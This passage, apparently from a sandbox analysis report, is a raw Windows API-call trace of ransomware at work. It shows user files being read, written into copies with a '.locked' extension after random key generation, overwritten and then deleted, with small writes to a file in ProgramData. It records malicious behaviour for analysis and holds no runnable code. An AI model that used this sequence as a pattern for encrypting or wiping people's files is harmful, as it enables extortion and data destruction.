(normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0261.361] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x12639e94 | out: lpMode=0x12639e94) returned 0 [0261.361] WriteFile (in: hFile=0x224, lpBuffer=0x123801c0*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x12639e64, lpOverlapped=0x0 | out: lpBuffer=0x123801c0*, lpNumberOfBytesWritten=0x12639e64*=0x31, lpOverlapped=0x0) returned 1 [0261.361] CloseHandle (hObject=0x224) returned 1 [0261.362] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\1TSkQagxs.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1tskqagxs.mp3")) returned 1 [0261.846] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0262.131] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0262.171] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0262.303] SetEvent (hEvent=0x1ac) returned 1 [0262.303] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0262.441] SetEvent (hEvent=0x20c) returned 1 [0262.441] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0262.999] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0263.010] SetEvent (hEvent=0x1e8) returned 1 [0263.010] SetEvent (hEvent=0x1ac) returned 1 [0263.010] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0263.026] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0263.033] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\1TSkQagxs.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1tskqagxs.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0265.061] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276ee88 | out: lpMode=0x1276ee88) returned 0 [0265.061] WriteFile (in: hFile=0x1e0, lpBuffer=0x159e2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ee78, lpOverlapped=0x0 | out: lpBuffer=0x159e2000*, lpNumberOfBytesWritten=0x1276ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0265.439] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0265.940] CloseHandle (hObject=0x1e0) returned 1 [0266.006] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0266.272] SetEvent (hEvent=0x1b8) returned 1 [0266.272] SetEvent (hEvent=0x14c) returned 1 [0266.273] SetEvent (hEvent=0x1d0) returned 1 [0266.273] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0266.479] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0266.479] SetEvent (hEvent=0x150) returned 1 [0266.479] SetEvent (hEvent=0x1d0) returned 1 [0266.479] SetEvent (hEvent=0x14c) returned 1 [0266.479] WriteFile (in: hFile=0x180, lpBuffer=0x15bd6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x15bd6000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0266.536] CloseHandle (hObject=0x180) returned 1 [0268.844] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PG2AA8VgUaJQix3.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pg2aa8vguajqix3.bmp")) returned 1 [0268.972] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12659a24*=0xb) returned 1 [0269.111] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\gKB9m3gAI3.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\gkb9m3gai3.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0269.112] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0269.112] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\gKB9m3gAI3.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\gkb9m3gai3.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0270.227] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0270.231] SetEvent (hEvent=0x22c) returned 1 [0270.231] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0270.231] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0270.316] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0270.433] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0270.925] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PCqRptQW6vY1N.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pcqrptqw6vy1n.gif")) returned 1 [0270.946] WriteFile (in: hFile=0x1f8, lpBuffer=0x167b0000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x167b0000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0272.915] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.191] SetEvent (hEvent=0x150) returned 1 [0273.191] SetEvent (hEvent=0x14c) returned 1 [0273.191] CloseHandle (hObject=0x1f8) returned 1 [0273.224] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.624] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.635] SetEvent (hEvent=0x1b8) returned 1 [0273.635] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.660] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.678] SetEvent (hEvent=0x1b8) returned 1 [0273.678] SetEvent (hEvent=0x190) returned 1 [0273.678] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12631a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12631a24*=0xb) returned 1 [0273.692] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.822] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0273.846] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0274.019] SetEvent (hEvent=0x1ac) returned 1 [0274.019] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\DWVUXEoQZyD.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dwvuxeoqzyd.flv")) returned 1 [0274.085] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0274.741] SetEvent (hEvent=0x190) returned 1 [0274.741] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0276.033] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0276.317] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0276.402] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0277.248] SetEvent (hEvent=0x1d0) returned 1 [0277.248] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0277.304] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0277.360] SetEvent (hEvent=0x220) returned 1 [0277.360] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0277.847] SetEvent (hEvent=0x190) returned 1 [0277.847] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0278.016] SetEvent (hEvent=0x20c) returned 1 [0278.016] SetEvent (hEvent=0x1dc) returned 1 [0278.016] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0278.097] SetEvent (hEvent=0x20c) returned 1 [0278.098] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0278.134] SetEvent (hEvent=0x1b8) returned 1 [0278.134] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0278.291] SetEvent (hEvent=0x1b8) returned 1 [0278.291] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_riLQBNOxB3yhpHCkj.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_rilqbnoxb3yhphckj.mkv")) returned 1 [0278.364] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0279.045] SetEvent (hEvent=0x214) returned 1 [0279.045] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0279.186] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\kY10RHpj1Ccj R.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ky10rhpj1ccj r.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0279.231] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0279.475] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1249ee88 | out: lpMode=0x1249ee88) returned 0 [0279.475] WriteFile (in: hFile=0x1a4, lpBuffer=0x17e84000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249ee78, lpOverlapped=0x0 | out: lpBuffer=0x17e84000*, lpNumberOfBytesWritten=0x1249ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0279.514] CloseHandle (hObject=0x1a4) returned 1 [0279.601] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\kY10RHpj1Ccj R.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ky10rhpj1ccj r.png")) returned 1 [0279.698] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\pQ4D7olyLasPf6h0yK.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\pq4d7olylaspf6h0yk.flv")) returned 1 [0280.608] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12621a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12621a24*=0xb) returned 1 [0280.611] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\P-STq-jQ5hYtJhIu5S.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\p-stq-jq5hytjhiu5s.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0280.612] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0280.612] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\P-STq-jQ5hYtJhIu5S.ots.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\p-stq-jq5hytjhiu5s.ots.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0280.612] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0280.613] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0280.613] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8080 | out: pbBuffer=0x124a8080) returned 1 [0280.613] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0280.613] WriteFile (in: hFile=0x230, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12621d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x12621d78*=0x80, lpOverlapped=0x0) returned 1 [0280.616] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0280.733] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0280.733] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa4, ulCount=0x10, ulNumEntriesRemoved=0x19fa84, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa4, ulNumEntriesRemoved=0x19fa84) returned 0 [0280.733] SetEvent (hEvent=0x150) returned 1 [0280.733] SetEvent (hEvent=0x1ac) returned 1 [0280.733] SetEvent (hEvent=0x198) returned 1 [0280.733] SetEvent (hEvent=0x214) returned 1 [0280.733] ReadFile (in: hFile=0x218, lpBuffer=0x169e8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x169e8000*, lpNumberOfBytesRead=0x12621d68*=0x18cf8, lpOverlapped=0x0) returned 1 [0280.738] WriteFile (in: hFile=0x230, lpBuffer=0x169e8000*, nNumberOfBytesToWrite=0x18cf8, lpNumberOfBytesWritten=0x12621d74, lpOverlapped=0x0 | out: lpBuffer=0x169e8000*, lpNumberOfBytesWritten=0x12621d74*=0x18cf8, lpOverlapped=0x0) returned 1 [0280.829] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0282.394] SetEvent (hEvent=0x198) returned 1 [0282.394] ReadFile (in: hFile=0x218, lpBuffer=0x169e8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x169e8000*, lpNumberOfBytesRead=0x12621d68*=0x0, lpOverlapped=0x0) returned 1 [0282.394] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0282.863] CloseHandle (hObject=0x230) returned 1 [0283.226] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0283.587] SetEvent (hEvent=0x14c) returned 1 [0283.587] CloseHandle (hObject=0x218) returned 1 [0283.587] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0284.484] SetEvent (hEvent=0x21c) returned 1 [0284.484] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0284.943] SetEvent (hEvent=0x1b8) returned 1 [0284.943] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0285.003] SetEvent (hEvent=0x214) returned 1 [0285.003] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0285.145] SetEvent (hEvent=0x190) returned 1 [0285.145] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0285.226] SetEvent (hEvent=0x184) returned 1 [0285.226] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0285.387] SetEvent (hEvent=0x1ac) returned 1 [0285.387] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0285.715] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\xxY CYyYbKsjdn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\xxy cyyybksjdn.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0285.715] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0285.715] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\xxY CYyYbKsjdn.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\xxy cyyybksjdn.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0286.582] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0287.366] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0287.366] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0287.366] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0287.367] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0287.367] WriteFile (in: hFile=0x228, lpBuffer=0x126eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x126eb000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0287.373] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0287.377] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0287.377] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa4, ulCount=0x10, ulNumEntriesRemoved=0x19fa84, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa4, ulNumEntriesRemoved=0x19fa84) returned 0 [0287.377] SetEvent (hEvent=0x150) returned 1 [0287.377] SetEvent (hEvent=0x22c) returned 1 [0287.378] SetEvent (hEvent=0x1ac) returned 1 [0287.378] SetEvent (hEvent=0x21c) returned 1 [0287.378] ReadFile (in: hFile=0x180, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1239fd68*=0x8f41, lpOverlapped=0x0) returned 1 [0287.380] WriteFile (in: hFile=0x228, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x8f41, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1239fd74*=0x8f41, lpOverlapped=0x0) returned 1 [0287.465] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0287.833] ReadFile (in: hFile=0x180, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0287.833] CloseHandle (hObject=0x228) returned 1 [0287.835] CloseHandle (hObject=0x180) returned 1 [0287.835] SetEvent (hEvent=0x134) returned 1 [0287.835] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0288.600] SetEvent (hEvent=0x1dc) returned 1 [0288.602] SetEvent (hEvent=0x190) returned 1 [0288.602] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0288.690] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0288.780] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0288.783] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0289.095] WriteFile (in: hFile=0x1bc, lpBuffer=0x153be000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249de78, lpOverlapped=0x0 | out: lpBuffer=0x153be000*, lpNumberOfBytesWritten=0x1249de78*=0xfa000, lpOverlapped=0x0) returned 1 [0289.224] CloseHandle (hObject=0x1bc) returned 1 [0289.264] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12625a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12625a24*=0xb) returned 1 [0289.562] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0290.233] SetEvent (hEvent=0x1dc) returned 1 [0290.233] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0290.258] WriteFile (in: hFile=0x1c8, lpBuffer=0x1353c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249ce78, lpOverlapped=0x0 | out: lpBuffer=0x1353c000*, lpNumberOfBytesWritten=0x1249ce78*=0xfa000, lpOverlapped=0x0) returned 1 [0290.293] CloseHandle (hObject=0x1c8) returned 1 [0290.411] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0290.590] SetEvent (hEvent=0x1dc) returned 1 [0290.590] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0290.637] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0292.930] SetEvent (hEvent=0x1dc) returned 1 [0292.930] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0293.005] SetEvent (hEvent=0x190) returned 1 [0293.005] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0293.094] SetEvent (hEvent=0x14c) returned 1 [0293.094] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0293.189] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0293.208] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa4, ulCount=0x10, ulNumEntriesRemoved=0x19fa84, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa4, ulNumEntriesRemoved=0x19fa84) returned 0 [0293.208] SetEvent (hEvent=0x150) returned 1 [0293.208] SetEvent (hEvent=0x14c) returned 1 [0293.208] SetEvent (hEvent=0x134) returned 1 [0293.208] SetEvent (hEvent=0x20c) returned 1 [0293.215] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0293.492] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0293.492] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0293.588] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0293.588] SetEvent (hEvent=0x190) returned 1 [0293.588] SetEvent (hEvent=0x1b8) returned 1 [0293.588] SetEvent (hEvent=0x20c) returned 1 [0293.588] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0293.659] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0293.659] SetEvent (hEvent=0x150) returned 1 [0293.659] SetEvent (hEvent=0x1b8) returned 1 [0293.659] SetEvent (hEvent=0x20c) returned 1 [0293.659] SetEvent (hEvent=0x190) returned 1 [0293.672] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\CX3dvz.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cx3dvz.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0295.273] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0295.328] SetEvent (hEvent=0x150) returned 1 [0295.328] SetEvent (hEvent=0x14c) returned 1 [0295.328] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1261fe88 | out: lpMode=0x1261fe88) returned 0 [0295.328] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0295.375] SetEvent (hEvent=0x14c) returned 1 [0295.375] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0295.428] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0296.259] SetEvent (hEvent=0x190) returned 1 [0296.259] SetEvent (hEvent=0x22c) returned 1 [0296.259] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0296.371] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0296.473] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0296.485] SetEvent (hEvent=0x14c) returned 1 [0296.485] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0297.997] SetEvent (hEvent=0x12c) returned 1 [0297.997] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0298.115] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0298.115] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1261fe94 | out: lpMode=0x1261fe94) returned 0 [0298.115] WriteFile (in: hFile=0x180, lpBuffer=0x1234a240*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1261fe64, lpOverlapped=0x0 | out: lpBuffer=0x1234a240*, lpNumberOfBytesWritten=0x1261fe64*=0x37, lpOverlapped=0x0) returned 1 [0298.159] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0298.923] CloseHandle (hObject=0x180) returned 1 [0298.923] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\My Music.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music.locked")) returned 0 [0299.102] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0299.737] RemoveDirectoryW (lpPathName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\My Music.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music.locked")) returned 0 [0299.742] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0299.809] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0299.835] SetEvent (hEvent=0x1ac) returned 1 [0299.836] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0299.841] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0299.842] SetEvent (hEvent=0x1f0) returned 1 [0299.842] SetEvent (hEvent=0x20c) returned 1 [0299.842] SetEvent (hEvent=0x1b8) returned 1 [0299.842] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0299.855] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, 